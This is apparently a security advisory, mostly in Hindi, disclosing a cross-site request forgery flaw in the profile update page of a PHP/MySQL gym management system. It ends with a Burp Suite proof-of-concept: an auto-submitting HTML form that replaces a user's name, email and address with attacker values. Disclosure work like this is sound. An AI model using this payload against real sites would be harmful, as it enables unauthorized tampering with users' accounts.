
GYM management system using PHP and MYSQL
PHP और MySQL का उपयोग करके बनाया गया एक जिम प्रबंधन प्रणाली।
Shoaib Alam - LinkedIn प्रोफ़ाइल
जिम प्रबंधन प्रणाली में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) कमज़ोरी की पहचान की गई है। यह समस्या उपयोगकर्ता पैनल की प्रोफ़ाइल अपडेट कार्यक्षमता में मौजूद है।
एप्लिकेशन में वर्तमान में एंटी-CSRF टोकन का कार्यान्वयन नहीं है, जिसके परिणामस्वरूप क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) हमलों की कमज़ोरी है। यह सुरक्षा कमज़ोरी विशेष रूप से /profile.php एंडपॉइंट को प्रभावित करती है। एक हमलावर इस दोष का शोषण करके संवेदनशील उपयोगकर्ता जानकारी, जैसे पता, नाम और फ़ोन नंबर में अनधिकृत संशोधन कर सकता है। यह संभावित रूप से उपयोगकर्ता खातों की अखंडता से समझौता कर सकता है और आगे सुरक्षा समस्याओं को जन्म दे सकता है।
कमज़ोर एंडपॉइंट: /profile.php
नीचे एक प्रूफ ऑफ कॉन्सेप्ट है जो CSRF कमज़ोरी को प्रदर्शित करता है। यह PoC Burp Suite Professional का उपयोग करके उत्पन्न किया गया था।
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost/gym/profile.php" method="POST">
<input type="hidden" name="fname" value="hacked" />
<input type="hidden" name="lname" value="victim" />
<input type="hidden" name="email" value="attacker@gmail.com" />
<input type="hidden" name="mobile" value="9999999999" />
<input type="hidden" name="state" value="hacked" />
<input type="hidden" name="city" value="hacked" />
<input type="hidden" name="address" value="hacked" />
<input type="hidden" name="submit" value="Update" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>